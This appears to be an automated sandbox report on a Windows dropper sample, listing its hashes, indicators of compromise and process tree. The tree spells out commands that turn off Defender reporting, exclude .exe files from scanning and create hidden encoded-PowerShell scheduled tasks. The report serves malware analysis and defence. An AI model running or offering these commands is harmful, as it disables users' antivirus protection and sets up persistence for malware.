Analysis
-
max time kernel
126s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2022 13:01
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
aa5e8e8ef501f165c360d7318eb54c0d
-
SHA1
9b24b0c36bdfd150862d6278febdc1bde6bc756b
-
SHA256
4019ca15d23fc982b1b6530fe8b828210a9b04e163758f16a1105ac511f4bad3
-
SHA512
0a3b4420dc813efc42ef66bcfebe1ad24762eaa03eefca4a617100e38f712428f347863de401deedfcdb6c93ada7a7bbd2d89887f40678a13780c554c1fa6bf1
-
SSDEEP
196608:91OiZPu7MHCoi0o3h/AGk+gOsDa3cw/qWL/7KoyCZ2B:3OSu7joiRh4Gk+gA3carLTKoyCe
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exeflow pid process 62 3500 rundll32.exe 63 3500 rundll32.exe 65 3500 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeCxyCLWn.exeWGyeiWG.exepid process 964 Install.exe 2084 Install.exe 4360 CxyCLWn.exe 808 WGyeiWG.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeWGyeiWG.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WGyeiWG.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3500 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
WGyeiWG.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json WGyeiWG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json WGyeiWG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json WGyeiWG.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
WGyeiWG.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini WGyeiWG.exe -
Drops file in System32 directory 31 IoCs
Processes:
CxyCLWn.exeWGyeiWG.exeInstall.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini CxyCLWn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies WGyeiWG.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WGyeiWG.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 WGyeiWG.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol CxyCLWn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WGyeiWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 WGyeiWG.exe -
Drops file in Program Files directory 14 IoCs
Processes:
WGyeiWG.exedescription ioc process File created C:\Program Files (x86)\BrFEHzbpwZEBC\kzEyTjK.dll WGyeiWG.exe File created C:\Program Files (x86)\BrFEHzbpwZEBC\gkMxLOp.xml WGyeiWG.exe File created C:\Program Files (x86)\ZFNizbZnU\mVPuHc.dll WGyeiWG.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi WGyeiWG.exe File created C:\Program Files (x86)\gCafjQbERGAU2\IEAkVXX.xml WGyeiWG.exe File created C:\Program Files (x86)\gCafjQbERGAU2\DmBVSPSuQHLcT.dll WGyeiWG.exe File created C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\OzcGixD.dll WGyeiWG.exe File created C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\agmessv.xml WGyeiWG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi WGyeiWG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WGyeiWG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja WGyeiWG.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WGyeiWG.exe File created C:\Program Files (x86)\ZFNizbZnU\JqBTaRe.xml WGyeiWG.exe File created C:\Program Files (x86)\aIaOnhtotwUn\pMrFZnA.dll WGyeiWG.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bdJibvckjBbeomyLL.job schtasks.exe File created C:\Windows\Tasks\byLWBUphYKVPGqoaZN.job schtasks.exe File created C:\Windows\Tasks\iczjDJyUUtiHxBiey.job schtasks.exe File created C:\Windows\Tasks\BQFrhQQBtTmYywN.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3596 schtasks.exe 1984 schtasks.exe 1000 schtasks.exe 4404 schtasks.exe 3780 schtasks.exe 4064 schtasks.exe 3100 schtasks.exe 2200 schtasks.exe 880 schtasks.exe 5052 schtasks.exe 4888 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWGyeiWG.exerundll32.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WGyeiWG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2" WGyeiWG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket WGyeiWG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume WGyeiWG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" WGyeiWG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\MaxCapacity = "15140" WGyeiWG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" WGyeiWG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000} WGyeiWG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEWGyeiWG.exepid process 872 powershell.EXE 872 powershell.EXE 880 powershell.exe 880 powershell.exe 4448 powershell.exe 4448 powershell.exe 740 powershell.EXE 740 powershell.EXE 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe 808 WGyeiWG.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 872 powershell.EXE Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 740 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXECxyCLWn.exepowershell.execmd.exedescription pid process target process PID 1224 wrote to memory of 964 1224 file.exe Install.exe PID 1224 wrote to memory of 964 1224 file.exe Install.exe PID 1224 wrote to memory of 964 1224 file.exe Install.exe PID 964 wrote to memory of 2084 964 Install.exe Install.exe PID 964 wrote to memory of 2084 964 Install.exe Install.exe PID 964 wrote to memory of 2084 964 Install.exe Install.exe PID 2084 wrote to memory of 4624 2084 Install.exe forfiles.exe PID 2084 wrote to memory of 4624 2084 Install.exe forfiles.exe PID 2084 wrote to memory of 4624 2084 Install.exe forfiles.exe PID 2084 wrote to memory of 4820 2084 Install.exe forfiles.exe PID 2084 wrote to memory of 4820 2084 Install.exe forfiles.exe PID 2084 wrote to memory of 4820 2084 Install.exe forfiles.exe PID 4624 wrote to memory of 4812 4624 forfiles.exe cmd.exe PID 4624 wrote to memory of 4812 4624 forfiles.exe cmd.exe PID 4624 wrote to memory of 4812 4624 forfiles.exe cmd.exe PID 4820 wrote to memory of 1724 4820 forfiles.exe cmd.exe PID 4820 wrote to memory of 1724 4820 forfiles.exe cmd.exe PID 4820 wrote to memory of 1724 4820 forfiles.exe cmd.exe PID 4812 wrote to memory of 2308 4812 cmd.exe reg.exe PID 4812 wrote to memory of 2308 4812 cmd.exe reg.exe PID 4812 wrote to memory of 2308 4812 cmd.exe reg.exe PID 4812 wrote to memory of 4084 4812 cmd.exe reg.exe PID 4812 wrote to memory of 4084 4812 cmd.exe reg.exe PID 4812 wrote to memory of 4084 4812 cmd.exe reg.exe PID 1724 wrote to memory of 912 1724 cmd.exe reg.exe PID 1724 wrote to memory of 912 1724 cmd.exe reg.exe PID 1724 wrote to memory of 912 1724 cmd.exe reg.exe PID 1724 wrote to memory of 4168 1724 cmd.exe reg.exe PID 1724 wrote to memory of 4168 1724 cmd.exe reg.exe PID 1724 wrote to memory of 4168 1724 cmd.exe reg.exe PID 2084 wrote to memory of 4064 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 4064 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 4064 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 676 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 676 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 676 2084 Install.exe schtasks.exe PID 872 wrote to memory of 2440 872 powershell.EXE gpupdate.exe PID 872 wrote to memory of 2440 872 powershell.EXE gpupdate.exe PID 2084 wrote to memory of 4136 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 4136 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 4136 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 3596 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 3596 2084 Install.exe schtasks.exe PID 2084 wrote to memory of 3596 2084 Install.exe schtasks.exe PID 4360 wrote to memory of 880 4360 CxyCLWn.exe powershell.exe PID 4360 wrote to memory of 880 4360 CxyCLWn.exe powershell.exe PID 4360 wrote to memory of 880 4360 CxyCLWn.exe powershell.exe PID 880 wrote to memory of 3492 880 powershell.exe cmd.exe PID 880 wrote to memory of 3492 880 powershell.exe cmd.exe PID 880 wrote to memory of 3492 880 powershell.exe cmd.exe PID 3492 wrote to memory of 1460 3492 cmd.exe reg.exe PID 3492 wrote to memory of 1460 3492 cmd.exe reg.exe PID 3492 wrote to memory of 1460 3492 cmd.exe reg.exe PID 880 wrote to memory of 808 880 powershell.exe reg.exe PID 880 wrote to memory of 808 880 powershell.exe reg.exe PID 880 wrote to memory of 808 880 powershell.exe reg.exe PID 880 wrote to memory of 4504 880 powershell.exe reg.exe PID 880 wrote to memory of 4504 880 powershell.exe reg.exe PID 880 wrote to memory of 4504 880 powershell.exe reg.exe PID 880 wrote to memory of 1120 880 powershell.exe reg.exe PID 880 wrote to memory of 1120 880 powershell.exe reg.exe PID 880 wrote to memory of 1120 880 powershell.exe reg.exe PID 880 wrote to memory of 1736 880 powershell.exe reg.exe PID 880 wrote to memory of 1736 880 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6DF1.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS70DF.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTCotaCwE" /SC once /ST 14:58:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTCotaCwE"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTCotaCwE"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byLWBUphYKVPGqoaZN" /SC once /ST 15:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\CxyCLWn.exe\" rw /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
